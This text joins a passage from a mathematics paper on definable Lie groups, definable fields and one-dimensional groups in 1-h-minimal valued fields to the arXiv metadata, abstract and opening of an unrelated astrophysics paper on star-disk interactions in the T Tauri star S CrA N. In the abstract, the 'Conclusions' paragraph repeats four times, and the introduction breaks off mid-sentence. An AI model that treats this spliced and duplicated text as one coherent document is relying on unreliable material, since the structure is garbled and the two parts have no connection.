inclusion \(i:H\to G\) is a closed embedding._ Proof.: By Proposition 5.20, there is an open dense set \(U\subset H\) such that \(i|_{U}\) is an embedding. Replacing \(U\) by \(U^{\prime}=U\setminus\operatorname{cl}(i(H)\setminus i(U))\) if necessary, and keeping in mind Proposition 2.18 to show \(U^{\prime}\) is large in \(H\), we may assume \(i(U)\) is open in \(i(H)\). By translation we conclude that \(i\) is an immersion. Also for an open set \(V\subset H\) we have that \(i(V)=i(\bigcup_{h\in H}hU\cap V)=\bigcup_{h}hi(U\cap h^{-1}V)\) is open in \(i(H)\). Since \(i\) is injective, the conclusion follows. As a consequence of the theorem on constant rank functions, Proposition 4.11, we have the following result: **Corollary 6.11**.: _Suppose \(U\) and \(V\) are definable strictly differentiable local Lie groups and let \(g,f:U\to V\) be definable strictly differentiable local Lie group morphisms. If we denote \(Z=\{x\in U:g(x)=f(x)\}\), then \(\dim_{e}Z=\dim(\ker(f^{\prime}(e)-g^{\prime}(e)))\)._ _In particular if \(G\) and \(H\) are definable strictly differentiable weak Lie groups and \(g,f\) are definable strictly differentiable Lie group morphisms then \(\dim\{x:f(x)=g(x)\}=\dim(\ker(f^{\prime}(e)-g^{\prime}(e)))\)._ Proof.: The second result follows from the first because of Lemma 5.8. In order to keep the proof readable we only verify the first statement in the case of weak Lie groups. The proof for local Lie groups is similar. By translating in \(G\) we see that the map \(f\cdot g^{-1}:G\to G\) has, at any point of \(G\), derivatives of constant rank equal to \(\dim(G)-k\), for \(k=\dim(\ker(f^{\prime}(e)-g^{\prime}(e)))\). Indeed, if \(u\in G\), then \((f\cdot g^{-1})L_{u}=L_{f(u)}R_{g(u)^{-1}}(f\cdot g^{-1})\), where \(L_{u}\), \(R_{u}\) denote the left and right translates by \(u\), respectively. By the chain rule we get \((f\cdot g^{-1})^{\prime}(u)L_{u}^{\prime}(e)=(L_{f(u)}R_{g(u)^{-1}})^{\prime}( f(u)\cdot g(u)^{-1})(f\cdot g^{-1})^{\prime}(e)\). As \(L_{u}\) and \(L_{f(u)}R_{g(u)}\) are definable strict diffeomorphisms, we have that their derivatives at any point are vector space isomorphisms, so we conclude that the rank of \((f\cdot g^{-1})^{\prime}(u)\) equals the rank of \((f\cdot g^{-1})^{\prime}(e)=f^{\prime}(e)-g^{\prime}(e)\) (see Fact 6.6), as desired. By the theorem on constant rank functions, Proposition 4.11, we conclude that there are nonempty open sets \(U\subset G\) and \(V\subset H\), balls \(B_{1},B_{2}\) and \(B_{3}\) around the origin and definable strictly differentiable isomorphisms \(\varphi_{1}:U\to B_{1}\times B_{2}\) and \(\varphi_{2}:V\to B_{1}\times B_{3}\), such that \(f(U)\subset V\) and \(\varphi_{2}f=\varphi_{1}\alpha\) for \(\alpha:B_{1}\times B_{3}\to B_{1}\times B_{3}\) the function \((x,y)\mapsto(x,0)\). Translating in \(G\) we may assume \(e\in U\). More precisely, from the formula \((f\cdot g^{-1})L_{u}=(L_{f(u)}R_{g(u)^{-1}})(f\cdot g^{-1})\) discussed before, if \(u\in U\) maps to \((0,0)\) under \(\varphi_{1}\), then \(e\in u^{-1}U\), so we may replace \((U,V,\varphi_{1},\varphi_{2})\) by \((u^{-1}U,f(u)^{-1}Vg(u),\varphi_{1}L_{u},\varphi_{2}L_{f(u)}R_{g(u)}^{-1})\). Note also that \(\varphi_{1}(e)=(0,0)\). In this case we obtain \(\{0\}\times B_{2}=\varphi_{1}(Z\cap U)\) so the local dimension of \(e\) at \(Z\) is the local dimension of \(\{0\}\times B_{2}\subset B_{1}\times B_{2}\) at \((0,0)\), which is the dimension of \(B_{2}\) and is as in the statement. In the particular case the dimension \(\dim(\ker(f^{\prime}(e)-g^{\prime}(e)))\) of the previous statement equals the dimension of \(G\) we get: **Corollary 6.12**.: _Suppose \(U\) and \(V\) are definable strictly differentiable local Lie groups and let \(g,f:U\to V\) be definable strictly differentiable local Lie group morphisms. Then \(f\) and \(g\) are equal (as local Lie group morphisms) if and only if \(f^{\prime}(0)=g^{\prime}(0)\)._ _In particular if \(G\) and \(H\) are definable strictly differentiable weak Lie groups and \(g,f\) are definable strictly differentiable Lie group morphisms then \(f\) and \(g\) coincide in an open neighborhood of the identity \(e\) if and only if \(f^{\prime}(e)=g^{\prime}(e)\)._ The following two corollaries are not needed for the sequel, but may be interesting on their own right. **Corollary 6.13**.: _Suppose \(H_{1}\) and \(H_{2}\) are subgroups of the strictly differentiable definable weak Lie group \(G\). Then \(T_{e}(H_{1}\cap H_{2})=T_{e}(H_{1})\cap T_{e}(H_{2})\) as subspaces of \(T_{e}(G)\)._ Proof.: This is a consequence of Corollary 6.11. Indeed, we know \(H_{1}\), \(H_{2}\) and \(H_{1}\cap H_{2}\) are strictly differentiable definable weak Lie groups and the inclusion maps \(H_{1}\cap H_{2}\to H_{i}\) and \(H_{i}\to G\) are strictly differentiable immersions, for example by Proposition 6.10, so the statement makes sense. We also have the diagonal map \(\Delta:H_{1}\cap H_{2}\to H_{1}\times H_{2}\) is the equalizer of the two projections \(p_{1}:H_{1}\times H_{2}\to G\) and \(p_{2}:H_{1}\times H_{2}\to G\). The kernel of the \(p_{1}^{\prime}(e)-p_{2}^{\prime}(e)\) is the image under the diagonal map of \(T_{e}(H_{1})\cap T_{e}(H_{2})\). So by the equality of the dimensions in Corollary 6.11 we conclude \(T_{e}(H_{1}\cap H_{2})=T_{e}(H_{1})\cap T_{e}(H_{2})\). **Corollary 6.14**.: _If \(G\) is a definable strictly differentiable weak Lie group and \(H_{1},H_{2}\) are subgroups, then there is \(U\subset G\) an open neighborhood of \(e\) such that \(U\cap H_{1}=U\cap H_{2}\) if and only if \(T_{e}(H_{1})=T_{e}(H_{2})\)._ Proof.: By Corollary 6.13 we get \(T_{e}(H_{3})=T_{e}(H_{1})=T_{e}(H_{2})\) for \(H_{3}=H_{1}\cap H_{2}\). Then as the inclusion \(H_{3}\to H_{1}\) produces an isomorphism of tangent spaces at the identity we conclude by the inverse function theorem 4.4 that there is \(U\subset G\) an open neighborhood of the identity, such that \(U\cap H_{1}=U\cap H_{3}\). Note that this also uses that the topology of \(H_{1}\) and \(H_{3}\) which makes them strictly differentiable definable Lie groups coincides with the subgroup topology coming from \(G\), see Proposition 6.10. Symmetrically we have \(U^{\prime}\cap H_{2}=U^{\prime}\cap H_{3}\) for some open \(U^{\prime}\). Next we give the familiar definition of the Lie bracket in \(T_{e}(G)\) for the definable Lie group \(G\), and show it forms a Lie algebra. **Definition 6.15**.: Suppose \(G\) is a definable strictly differentiable weak Lie group. For \(g\in G\) we consider the map \(c_{g}:G\to G\) defined by \(c_{g}(h)=ghg^{-1}\). Then \(c_{g}\) is a definable group morphism and so it is strictly differentiable, see Proposition 5.7. Its derivative produces a map \(\operatorname{Ad}:G\to\operatorname{Aut}_{K}(T_{e}(G))\), \(g\mapsto c_{g}^{\prime}(e)\) which is a definable map and a group morphism by the chain rule and the equation \(c_{g}c_{h}=c_{gh}\). Then \(\operatorname{Ad}\) is strictly differentiable and so its derivative at \(e\) gives a linear map \(\operatorname{ad}:T_{e}(G)\to\operatorname{End}_{K}(T_{e}(G))\). In other words this gives a bilinear map \((x,y)\mapsto\operatorname{ad}(x)(y)\), \(T_{e}(G)\times T_{e}(G)\to T_{e}(G)\) denoted \((x,y)\mapsto[x,y]\). This map is called the Lie bracket. **Proposition 6.16**.: _Let \(G\) be a definable weak \(T_{2}\)-Lie group. Let \(0\in U\subset K^{n}\) be an open set and \(i:U\to G\) a \(T_{2}\)-diffeomorphism of \(U\) onto an open subset of \(G\), that sends \(0\) to \(e\). Make \(U\) into a local definable group via \(i\). Then under the identification \(i^{\prime}(0):K^{n}\to T_{e}(G)\) we have that the Lie bracket is characterized by the property \(x\cdot y\cdot x^{-1}\cdot y^{-1}=[x,y]+O(x,y)^{3}\), for \(x,y\in U\)._ Proof.: We have that the function \(f(x,y)=x\cdot y\cdot x^{-1}\) satisfies \(f(0,y)=y\) and \(f(x,0)=0\), so its Taylor approximation of order 2 is of the form \(f(x,y)=y+axy+O(x,y)^{3}\). Indeed it is of the form \(a_{0}+a_{1}x+a_{2}y+a_{3}x^{2}+a_{4}xy+a_{5}y^{2}+O(x,y)^{3}\) and plugging \(x=0\) and using the uniqueness of the Taylor approximation we get \(a_{0}=a_{5}=0\) and \(a_{2}=1\), and a similar argument with \(y=0\) gives \(a_{1}=a_{3}=0\), so \(f(x,y)=y+axy+O(x,y)^{3}\) as claimed. From the definition of \(\operatorname{Ad}(x)\) we get \(f(x,y)=\operatorname{Ad}(x)y+O_{x}(y^{2})\) where \(O_{x}\) means the coefficient may depend on \(x\). Note that the definition of \(\operatorname{ad}(x)\) gives \(\operatorname{Ad}(x)(y)=y+[x,y]+O(x^{2}y)\). Indeed, we have \(\operatorname{Ad}(x)=\operatorname{Ad}(0)+\operatorname{Ad}^{\prime}(0)(x)+O( x^{2})=I+\operatorname{ad}(x)+O(x^{2})\), where \(I\) is the identity matrix, and evaluating at \(y\) we conclude \(\operatorname{Ad}(x)y=y+[x,y]+O(x^{2}y)\). We conclude that \(y+axy+O(x,y)^{3}=y+[x,y]+O_{x}(y^{2})\). This implies \([x,y]=axy\). See Lemma 3.15. Now from \(x\cdot y\cdot x^{-1}=y+axy+O(y,x)^{3}\), and the formula \(x\cdot y^{-1}=x-y+b_{0}x^{2}+b_{1}xy+b_{2}y^{2}+O(x,y)^{3}\) (see Fact 6.6), we get \(x\cdot y\cdot x^{-1}\cdot y^{-1}=(x\cdot y\cdot x^{-1})\cdot y^{-1}=axy+b_{3}y^ {2}+O(x,y)^{3}\). On the other hand if \(c(x,y)=x\cdot y\cdot x^{-1}\cdot y^{-1}\) then \(c(0,y)=0\) implies that \(b_{3}=0\), as required. **Proposition 6.17**.: _Let \(G\) be a definable strictly differentiable weak Lie group. Then \((T_{e}(G),[,])\) is a Lie algebra._ Proof.: We have to prove \([x,x]=0\) and the Jacobi identity. We will use the characterization of Proposition 6.16 (we may assume \(G\) is \(T_{2}\) by Proposition 6.4). \([x,x]=0\) now follows immediately. The idea of proof of the Jacobi identity is to express \(xyz\) as \(f(x,y,z)zyx\) in two different ways using associativity, the first one permutes from left to right, the second permutes \(yz\) and then permutes from left to right. The details follow. Writing \(c(x,y)=xyx^{-1}y^{-1}\) one has \[xyz=c(x,y)yxz=c(x,y)yc(x,z)zx=c(x,y)([y,c(x,z)]+O(y,c(x,z))^{3})c (x,z)yzx=\] \[c(x,y)([y,[x,z]]+O(x,y,z)^{4})c(x,z)c(y,z)zyx=\] \[(c(x,y)+[y,[x,z]]+c(x,z)+c(y,z)+O(x,y,z)^{4})zyx.\] At the last step we use the formula \(xy=x+y+O(x,y)^{2}\) And on the other hand \[xyz=xc(y,z)zy=([x,c(y,z)]+O(x,c(y,z))^{3})c(y,z)xzy=\] \[([x,[y,z]]+O(x,y,z)^{4})c(y,z)c(x,z)zxy=([x,[y,z]]+O(x,y,z)^{4})c(y,z)c(x,z)zc(x,y)yx=\] \[([x,[y,z]]+O(x,y,z)^{4})c(y,z)c(x,z)([z,[x,y]]+O(x,y,z)^{4})c(x,y) zyx=\] \[([x,[y,z]]+c(y,z)+c(x,z)+c(x,y)+[z,[x,y]]+O(x,y,z)^{4})zyx.\] From this we get \([y,[x,z]]=[x,[y,z]]+[z,[x,y]]+O(x,y,z)^{4}\) and from the uniqueness of Taylor expansions we obtain \([y,[x,z]]=[x,[y,z]]+[z,[x,y]]\) which is the Jacobi identity. Given a strictly differentiable definable weak Lie group \(G\), we denote \(Lie(G)\) the tangent space \(T_{e}(G)\) considered as a Lie algebra with the Lie bracket \([x,y]\). ## 7. Definable fields In this section we prove that if \(L\) is a definable field in a 1-h-minimal valued field then, as a definable field, \(L\) isomorphic to a finite field extension of \(K\). This is result generalizes [2, Theorem 4.2], where this is proved for real closed valued fields, and [12, Theorem 4.1] where this is proven for \(p\)-adically closed fields. With the terminology and results we have developed in the previous section the main ingredients of the proof are similar to those appearing in the classification of infinite fields definable in o-minimal fields, [10, Theorem 1.1]. **Lemma 7.1**.: _Suppose \(K\) is 1-h-minimal, \(L\subseteq K\) a definable subfield. Then \(L=K\)._ Proof.: \(L\) is a definable set which is infinite because the characteristic of \(K\) is \(0\). We conclude that there is a nonempty open ball \(B\subset L\), for example by dimension theory, item 2 of Proposition 2.11. The field generated by a nonempty open ball is \(K\). Indeed \(B-B\) contains a ball around the origin \(B^{\prime}\), \(C=B^{\prime}\setminus\{0\}^{-1}\) is the complement of a closed ball, and \(C-C=K\). **Lemma 7.2**.: _Suppose \(K\) is 1-h-minimal. Let \(F_{1}\) and \(F_{2}\) be finite extensions of \(K\), and consider them as definable fields in \(K\). If \(\varphi:F_{1}\to F_{2}\) is a definable field morphism, then \(\varphi\) is a morphism of \(K\) extensions, in other words it is the identity when restricted to \(K\)._ Proof.: The set \(\{x\in K:\varphi(x)=x\}\) is a definable subfield of \(K\), so Lemma 7.1 give the desired conclusion. **Proposition 7.3**.: _Suppose \(K\) is 1-h-minimal and \(F\) is a definable field. Then \(F\) is isomorphic as a definable field to a finite extension of \(K\). The forgetful functor from finite \(K\)-extensions to definable fields is an equivalence of categories._ Proof.: That the functor is full is Lemma 7.2. Let \(F\) be a definable field. By Proposition 6.4 we have that \((F,+)\) is a definable strictly differentiable weak Lie group. If \(a\in F\) the map \(L_{a}:x\mapsto ax\) is a definable group morphism and so it is strictly differentiable, by the fullness in Proposition 6.4. We get a definable map \(f:F\to M_{n}(K)\) defined as \(a\mapsto L_{a}^{\prime}(0)\). By the chain rule we have \(f(ab)=f(a)f(b)\) for all \(a,b\in F\). Clearly \(f(1)=1\). Finally one has \(f(a+b)=f(a)+f(b)\) (the derivative of multiplication \(G\times G\to G\) in a Lie group is the sum map, see for instance Fact 6.6). We conclude that \(f\) is a ring map, and because \(F\) is a field it is injective. If we set \(i:K\to M_{n}(K)\) given by \(i(k)=kI\) where \(I\) is the identity matrix, then \(i^{-1}f(F)\subset K\) is a definable subfield of \(K\), and so by Lemma 7.1 one has \(i(K)\subset f(F)\). So \(F/K\) is a finite field extension as required. ## 8. One dimensional groups are finite by abelian by finite In this section we prove that if \(K\) is a 1-h-minimal valued field and \(G\) is a one dimensional group definable in \(K\) then \(G\) is finite-by-abelian-by-finite. This generalizes [13, Theorem 2.5] where it is proved that one dimensional groups definable in p-adically closed fields are abelian-by-finite. This result is analogous to [11, Corollary 2.16] where it is shown that a one dimensional group definable in an o-minimal structure is abelian-by-finite. The proof here is not a straightforward adaptation of either, since we do not assume NIP, making the argument more involved. **Definition 8.1**.: Let \(G\) be a group. We let \(C^{w}\) denote the set of elements \(x\in G\) whose centralizer, \(c_{G}(x)\), has finite index in \(G\). Note that \(C^{w}\) is a characteristic subgroup of \(G\). **Lemma 8.2**.: _Suppose \(G\) is an (abstract) group. Take \(C^{w}\) as in Definition 8.1, \(Z\) its center. Then \(C^{w}\) and \(Z\) are characteristic groups of \(G\), and \(Z\) is commutative. Moreover \(Z\) has finite index in \(G\) if and only if \(G\) is abelian-by-finite._ _When \(G\) is definable in a geometric theory, \(C^{w}\) and \(Z\) are definable. Also \(x\in C^{w}\) if and only if \(\dim(c_{G}(x))=\dim(G)\)._ Proof.: It is clear that \(C^{w}\) and \(Z\) are characteristic, and that \(Z\) is abelian. So, in particular, if \([G:Z]<\infty\) then \(G\) is abelian-by-finite. On the other hand, if \(A\) is an abelian subgroup of finite then \(A\subset C^{w}\), as \(A\subset c_{G}(a)\) for every \(a\in A\). If \(a_{1},\ldots,a_{n}\) are a set of representatives for left cosets of \(A\) in \(C^{w}\) then \(\bigcap_{k=1}^{n}c_{G}(a_{k})\cap A\subset Z\), and as \(a_{k}\in C^{w}\), the \(c_{G}(a_{k})\) have finite index in \(G\), and so \(Z\) has finite index in \(G\). If \(G\) is definable in a geometric theory note that \(x\in C^{w}\) if and only if \(x^{G}\), the orbit of \(G\) under conjugation, is finite. This is because the fibers of the map \(x\mapsto x^{g}\) are cosets of \(c_{G}(x)\). So is definable because a geometric theory eliminates the exist infinity quantifier. We also get that if \(\dim(c_{G}(x))=\dim(G)\) then \(c_{G}(x)\) is of finite index. **Lemma 8.3**.: _Suppose \(f:X\times Y\to Z\) is a function definable in a pregeometric theory. Denote \(n=\dim(X)\) and \(m=\dim(Y)\). Suppose for all \(x\in X\) the nonempty fibers of the function \(f_{x}(y)=f(x,y)\) have dimension \(m\). Suppose that for all \(y\in Y\) the nonempty fibers of the function \(f_{y}(x)=f(x,y)\) have dimension \(n\). Then \(f\) has finite image._ Proof.: We claim that the nonempty fibers of \(f\) have dimension \(n+m\). Indeed, if \((x_{0},y_{0})\in X\times Y\), then \(f^{-1}f(x_{0},y_{0})\) contains \(\cup_{x\in f_{y_{0}}^{-1}f_{y_{0}}(x_{0})}\{x\}\times f_{x}^{-1}f_{x}(y_{0})\), so we conclude by the additivity of dimension. **Lemma 8.4**.: _Suppose \(G\) is definable in a pregeometric theory and \(G=C^{w}\). Then the image of the commutator map \(c:G\times G\to G\) is finite._ Proof.: The commutator map \(c(x,y)\) is constant when \(x\) is fixed and \(y\) varies over a right coset of \(c_{G}(y)\), and it is constant when \(y\) is fixed and \(x\) varies over a right coset of \(c_{G}(x)\). This implies that the image of \(c\) is finite, see Lemma 8.3. **Lemma 8.5**.: _Suppose \(G\) is an \(n\)-dimensional group definable in a pregeometric theory such that \(G=C^{w}\). Then there is a definable characteristic subgroup, \(G_{1}\), of finite index with a characteristic finite subgroup \(L\), central in \(G_{1}\), such that \(G_{1}/L\) is abelian. If \(Z\) is the center of \(G_{1}\) then \(Z/L\) contains \((G_{1}/L)^{m}\), the \(m\)-th powers of \(G_{1}/L\), for some \(m\)._ _If the theory is NIP then the center of \(G\) has finite index._ Proof.: If the theory has NIP then the center is finite index by Baldwin-Saxl (e.g., [14, Lemma 1.3]). Indeed, \(Z=\bigcap_{g\in G}c_{G}(g)\) is an intersection of a definable family subgroups, each of which is finite index by the assumption \(G=C^{w}\). So, as \(G\) is NIP one gets that \(Z\) is the intersection of finitely many of the centralizers and \([G:Z]<\omega\). In general, by Lemma 8.4 we know that \(c(G,G)\) is finite. The centralizer of \(c(G,G)\) is \(G_{1}\) and has finite index in \(G\) by the hypothesis that \(G=C^{w}\). Clearly \(G_{1}\) is characteristic in \(G\), so we may replace \(G\) by \(G_{1}\) and assume that \(c(G,G)\) is contained in the center of \(G\). In this case we prove that \(c(G,G)\) generates a finite central characteristic group \(L=D(G)\). Indeed, since \(c(G,G)\) is central, a simple computation shows \(c(gh,x)=c(g,x)c(h,x)\) for all \(g,h,x\in G\). It follows that \(c(g,h)^{m}=c(g^{m},h)\) is in \(c(G,G)\). Thus \(c(g,h)\) has finite order. As \(c(G,G)\) is central with elements of finite order, the group it generates is central and finite. It is obviously characteristic. We also see that if \(m\) is the order of \(D(G)\) then \(g^{m}\in Z\) for all \(g\in G\). This is because \(c(g^{m},h)=c(g,h)^{m}=1\), so \((G/D(G))^{m}\) is contained in \(Z/D(G)\) as required. **Lemma 8.6**.: _Suppose \(G\) is an \(n\)-dimensional abelian group definable in a 1-\(h\)-minimal theory. Then the \(m\)-torsion of \(G\) is finite and \(G^{m}\subset G\) is a subgroup of dimension \(n\)._ Proof.: The map \(x\mapsto x^{m}\) is a definable group morphism with invertible derivative at the identity, see for instance Fact 6.6, so by Corollary 6.11 we get that the \(m\)-torsion of \(G\) is finite, and so by additivity of dimension \(\dim(G^{m})=\dim(G)=n\) **Lemma 8.7**.: _Suppose \(G\) is an \(n\)-dimensional group definable in a 1-h-minimal field. Then \(C^{w}\) is the kernel of the map \(\operatorname{Ad}:G\to GL_{n}(K)\)._ _If the Lie algebra \(\operatorname{Lie}(G)\) is abelian, then \(C^{w}\) has finite index._ Proof.: The first statement follows from Corollary 6.12 and Lemma 8.2. If the Lie bracket is abelian, then, by the definition of the Lie bracket, the derivative of \(\operatorname{Ad}\) at \(e\) is \(0\). This means that \(C^{w}=\ker(\operatorname{Ad})\) contains an open neighborhood of \(e\) by Corollary 6.12, so \(C^{w}\) is \(n\)-dimensional. As the kernel of \(\operatorname{Ad}\) is \(C^{w}\) we conclude that \(C^{w}\) has finite index in \(G\) by the additivity of dimension. **Lemma 8.8**.: _Suppose \(G\) is an \(n\)-dimensional finite-by-abelian group definable in a 1-h-minimal theory. Then \(G=C^{w}\) and the center of \(G\) has dimension \(n\)._ Proof.: Let \(H\) be finite normal such that \(G/H\) is abelian. By finite elimination of imaginaries in fields we have that \(G/H\) is definable. Also by Corollary 6.11 we see that that the quotient map \(p:G\to G/H\) induces an isomorphism of tangent spaces at the identity, and under this isomorphism \(1=\operatorname{Ad}(p(g))=\operatorname{Ad}(g)\) for all \(g\in G\). We conclude that \(G=C^{w}\), by Lemma 8.7. Now if we apply Lemma 8.5 we get characteristic groups \(L\subset G_{1}\subset G\) such that \(G/G_{1}\) is finite, \(L\) is finite and \(G_{1}/L\) is abelian, and \(Z(G_{1})/L\supset(G_{1}/L)^{m}\) for some \(m\). Note that \(Z(G_{1})\) contains a finite index subgroup of \(Z(G)\), so we just have to see that \((G_{1}/L)^{m}\) has dimension \(n\). This follows from Lemma 8.6. **Proposition 8.9**.: _Suppose \(K\) is 1-h-minimal. Suppose \(G\) is a strictly differentiable definable weak Lie group. Then \(\operatorname{Lie}(G)\) is abelian if and only if \(G\) is finite-by-abelian-by-finite. In this case \(G\) has characteristic definable subgroups \(L\subset G_{1}\subset G\) such that \(G/G_{1}\) is finite, \(G_{1}/L\) is abelian, and \(L\) is finite and central in \(G_{1}\). Also if \(Z\) is the center of \(G^{\prime}\), then \(Z\) is \(n\)-dimensional, and \(Z/L\) contains \((G_{1}/L)^{m}\) for some \(m\)._ _If \(K\) is NIP then we may take \(L=1\)._ Proof.: This follows by putting the previous results together, Lemmas 8.7, 8.5, 8.8. **Corollary 8.10**.: _Suppose \(G\) is a one dimensional group definable in a 1-h-minimal valued field. Then \(G\) is finite-by-abelian-by-finite. If the theory is NIP then \(G\) is abelian-by-finite._ Proof.: By Proposition 6.4 we get that \(G\) is a strictly differentiable definable weak Lie group. The result now follows from Proposition 8.9 because the only one dimensional Lie algebra is abelian. In the NIP case this corollary follows more directly from the fact that a definable group is definably weakly Lie. Indeed, this implies that there is an element \(x\in G\) with \(x^{n}\neq e\) (because the derivative of the map \(x\mapsto x^{n}\) at \(e\) is \(v\mapsto nv\), which is not equal to \(0\), see Fact 6.6). By \(\aleph_{0}\)-saturation there is an \(x\in G\) such that the group generated by \(x\) is infinite. Then by [13], Remark 2.4, one has that the centralizer of the centralizer of \(x\) has finite index and is abelian. Indeed, note that if \(a\in c_{G}(x)\), \(c_{G}(a)\) contains the group generated by \(x\), and so it is of dimension \(1\). The last corollary shows that the classification of one dimensional abelian groups definable in ACVF carried out in [1] extends to all definable \(1\)-dimensional groups, for \(K\) of characteristic \(0\) (see also the main result of [7]). I.e., since \(\operatorname{ACVF}_{0}\) is 1-h-minimal and NIP, 1-dimensional definable groups are abelian-by-finite, and the classification of definable \(1\)-dimensional abelian groups of [1] applies. We do not know if this corollary is true in \(\mathrm{ACVF}_{p,p}\). Similarly, the commutativity assumption is unnecessary in the classification of \(1\)-dimensional groups definable in pseudo-local fields of residue characteristic \(0\). As those are pure henselian they, too, are \(1\)-h-minimal, so we may apply Proposition 8.9. To get the full result we observe that though pseudo-local fields are not NIP, an inspection of the list of the definable \(1\)-dimensional abelian groups, \(A\), obtained in [1] shows they are almost divisible (i.e., \(nA\) has finite index in \(A\) for all \(n\)). Therefore, in the notation of Proposition 8.9 the center of \(G_{1}\) has finite index in \(G_{1}\), and so every one dimensional group is abelian-by-finite. **Question 8.11**.: If \(G\) is finite-by-abelian, does the center of \(G\) have finite index in \(G\)? This is true if the theory is NIP or if \(nA\) has finite index in \(A\) for every abelian definable group, by Lemmas 8.8 and 8.5. **Remark 8.12**.: \(\mathrm{ACVF}_{p,p}\) does not fit into the framework of 1-h-minimality. However, many of the ingredients in previous sections translate to this setting. For example: \(K\) is geometric, a subset of \(K^{n}\) has dimension \(n\) if and only if it contains a nonempty open set, one-to-finite functions defined in an open set are generically continuous, functions definable in an open set are generically continuous, and \(K\) is definably spherically complete. That one-to-finite functions are generically continuous follows from the fact that \(\mathrm{acl}(a)\) coincides with the field-theoretic algebraic closure of \(a\) and by a suitable result about continuity of roots. That functions are generically continuous follows from the fact that \(\mathrm{dcl}(a)\) is the Henselization of the perfect closure of \(a\), so a definable function is definably piecewise a composition of rational functions, inverse of the Frobenius automorphism and roots of Hensel polynomials, all of these functions being continuous. However, the inverse of the Frobenius is not differentiable anywhere, so Proposition 3.12 does not hold. Also the Frobenius is an homeomorphism with \(0\) derivative, so for example Proposition 4.6 does not hold.
2308.03442
Star-disk interactions in the strongly accreting T Tauri Star S CrA N
Aims : We aimed at constraining the accretion-ejection phenomena around the strongly-accreting Northern component of the S CrA young binary system (S CrA N) by deriving its magnetic field topology and its magnetospheric properties, and by detecting ejection signatures, if any. Methods : We led a two-week observing campaign on S CrA N with the ESPaDOnS optical spectropolarimeter at the Canada-France-Hawaii Telescope. We recorded 12 Stokes I and V spectra over 14 nights. We computed the corresponding Least-Square Deconvolution (LSD) profiles of the photospheric lines and performed Zeeman-Doppler Imaging (ZDI). We analysed the kinematics of noticeable emission lines, namely He I $\lambda 5876$ and the four first lines of the Balmer series, known to trace the accretion process. Conclusions : The findings from spectropolarimetry are complementary to those provided by optical long-baseline interferometry, allowing us to construct a coherent view of the innermost regions of a young, strongly accreting star. Yet, the strong and complex magnetic field reconstructed for S CrA N is inconsistent with the observed magnetic signatures of the emission lines associated to the post-shock region. We recommend a multi-technique, synchronized campaign of several days to put more constrains on a system that varies on a $\sim$ 1 day timescale.
H. Nowacki, E. Alecian, K. Perraut, B. Zaire, C. P. Folsom, K. Pouilly, J. Bouvier, R. Manick, G. Pantolmos, A. P. Sousa, C. Dougados, G. A. J. Hussain, S. H. P. Alencar, J. B. Le Bouquin
2023-08-07T09:57:31Z
http://arxiv.org/abs/2308.03442v1
# Star-disk interactions in the strongly accreting T Tauri Star S CrA N+ ###### Abstract Context:Classical T Tauri Stars are thought to accrete material from their surrounding protoplanetary disks through funnel flows along their magnetic field lines. Among them, those with high accretion rates (\(\sim 10^{-7}\)M\({}_{\odot}\) yr\({}^{-1}\)) are ideal targets to test this magnetospheric accretion scenario in a sustained regime. Aims:We aimed at constraining the accretion-ejection phenomena around the strongly-accreting Northern component of the S CrA young binary system (S CrA N) by deriving its magnetic field topology and its magnetospheric properties, and by detecting ejection signatures, if any. Methods:We lead a two-week observing campaign on S CrA N with the ESPaDOnS optical spectropolarimeter at the Canada-France-Hawaii Telescope. We recorded 12 Stokes \(I\) and \(V\) spectra over 14 nights. We computed the corresponding Least-Square Deconvolution (LSD) profiles of the photospheric lines and performed Zeeman-Doppler Imaging (ZDI). We analysed the kinematics of noticeable emission lines, namely He I \(\lambda\)586 and the four first lines of the Balmer series, known to trace the accretion process. Results:We found that S CrA N is a low-mass (0.8 M\({}_{\odot}\)), young (\(\sim 1\) Myr), and fully convective object exhibiting a strong and variable veiling (with a mean value of \(7\pm 2\)), which suggests that the star is in a strong accretion regime. These findings could indicate a stellar evolutionary stage between Class I and Class II for S CrA N. We reconstructed an axisymmetric large-scale magnetic field (\(\sim 70\)% of the total energy), primarily located in the dipolar component but with significant higher poloidal orders. From the He I \(\lambda\)5876 narrow emission component radial velocity curve, we derived a stellar rotation period of \(P_{*}=7.3\pm 0.2\) days. We found a magnetic truncation radius of \(\sim 2\) R, which is significantly closer to the star than the corotation radius of \(\sim 6\) R\({}_{*}\), suggesting that S CrA N is in an unstable accretion regime. The truncation radius being quite smaller than the size of the Br\(\gamma\) line emitting region, as measured with the GRAVITY interferometer (\(\sim 8\) R\({}_{*}\)), supports the presence of outflows, which is nicely corroborated by the line profiles presented in this work. Conclusions:The findings from spectropolarimetry are complementary to those provided by optical long-baseline interferometry, allowing us to construct a coherent view of the innermost regions of a young, strongly accreting star. Yet, the strong and complex magnetic field reconstructed for S CrA N is inconsistent with the observed magnetic signatures of the emission lines associated to the post-shock region. We recommend a multi-technique, synchronized campaign of several days to put more constrains on a system that varies on a \(\sim 1\) day timescale. Conclusions:The findings from spectropolarimetry are complementary to those provided by optical long-baseline interferometry, allowing us to construct a coherent view of the innermost regions of a young, strongly accreting star. Yet, the strong and complex magnetic field reconstructed for S CrA N is inconsistent with the observed magnetic signatures of the emission lines associated to the post-shock region. We recommend a multi-technique, synchronized campaign of several days to put more constrains on a system that varies on a \(\sim 1\) day timescale. Conclusions:The findings from spectropolarimetry are complementary to those provided by optical long-baseline interferometry, allowing us to construct a coherent view of the innermost regions of a young, strongly accreting star. Yet, the strong and complex magnetic field reconstructed for S CrA N is inconsistent with the observed magnetic signatures of the emission lines associated to the post-shock region. We recommend a multi-technique, synchronized campaign of several days to put more constrains on a system that varies on a \(\sim 1\) day timescale. Conclusions:The findings from spectropolarimetry are complementary to those provided by optical long-baseline interferometry, allowing us to construct a coherent view of the innermost regions of a young, strongly accreting star. Yet, the strong and complex magnetic field reconstructed for S CrA N is inconsistent with the observed magnetic signatures of the emission lines associated to the post-shock region. We recommend a multi-technique, synchronized campaign of several days to put more constrains on a system that varies on a \(\sim 1\) day timescale. zind 1990; Koenigl 1991; Espaillat 2022). These phenomena shape many properties of the accreting objects and can be investigated by spectroscopy, spectropolarimetry, and photometry as their host stars exhibit excess continuum emission in the optical and near-infrared ranges, hot and cold spots, as well as broad, intense, and variable emission lines in the visible and near-infrared ranges (e.g., Alencar et al. 2012, 2018; Sousa et al. 2021, 2023). The accretion regime depends on the large-scale magnetic field strength (i.e., usually a dipole), the angle between the dipolar magnetic-field and stellar rotation axes, and the mass accretion rate (Kulkarni and Romanova 2008; Blinova et al. 2016). It can be either stable when occurring through two 